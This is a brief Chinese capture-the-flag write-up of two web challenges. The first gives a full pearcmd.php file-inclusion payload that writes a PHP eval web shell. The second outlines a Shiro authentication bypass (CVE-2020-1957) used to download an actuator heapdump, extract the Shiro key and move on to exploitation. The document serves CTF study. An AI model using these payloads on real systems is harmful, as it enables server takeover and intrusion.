easywill
本人sb,写好的wp被窝删掉了QAQ
很简单的一道题包含pearcmd.php(审计一下源码就能看到)
好像竞争上传也可以(没试)
payload还记得
/index.php?+config-create+/&&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/shell.php
写入然后包含一下就行
Pentest in Autumn
给了附件,打开之后发现是shiro框架
第一反应就是看看有没有actuator未授权访问漏洞
这样拿到key就可以工具一把梭哈
访问/actuator路由,有如下内容
继续访问heapdump,发现跳到了404
到这里卡了很久,后来想到能不能绕过一下
又看到Shiro < 1.5.2 想到shiro权限绕过 CVE-2020-1957
https://blog.csdn.net/weixin_50464560/article/details/120752809
随即构造url
/;/actuator/heapdump
成功下载到heapdump文件
接下来就是寻找key的过程
https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html
参考此文章利用visualvm工具成功拿到了key
然后利用shiro attack 工具,一把梭